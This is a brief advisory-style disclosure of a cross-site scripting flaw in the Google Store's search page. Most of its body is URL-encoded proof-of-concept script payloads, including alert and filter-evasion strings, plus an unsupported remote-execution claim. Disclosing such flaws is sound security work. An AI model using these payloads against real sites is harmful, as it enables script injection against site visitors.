The Google Store at www.googlestore.com suffers from a cross site scripting vulnerability in googlesearch.aspx.
dc09705ceaa893c9c89991f080dca176dedec09a91281d3fcaa97f2c3694f448
Author(s): Ivan Sanchez
Product: Google Store
Web: http://www.googlestore.com/googlesearch.aspx?category= [1]
Evil Function:
-------------------
googlesearch.aspx?
Exploiting:
--------------
http://www.googlestore.com/googlesearch.aspx?category= XSS & Remote
Execution Code
Real case only to check the bug :
http://www.googlestore.com/googlesearch.aspx?category=http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10
http://www.googlestore.com/googlesearch.aspx?category=all&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&x=25">
[2]
Many Thanks
Ing. Ivan Javier Sanchez
Ivan.Sanchez@nullcode.com.ar
http://www.linkedin.com/in/nullcode
Links:
------
[1] http://www.googlestore.com/googlesearch.aspx?category=
[2]
http://www.googlestore.com/googlesearch.aspx?category=all&q=%3E%3Cscript%3Ealert%28%27Xss%27%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EBy%2BNullcode.com.ar%3C%2Fh1%3E%3C%2Fmarquee%3E&x=20&y=10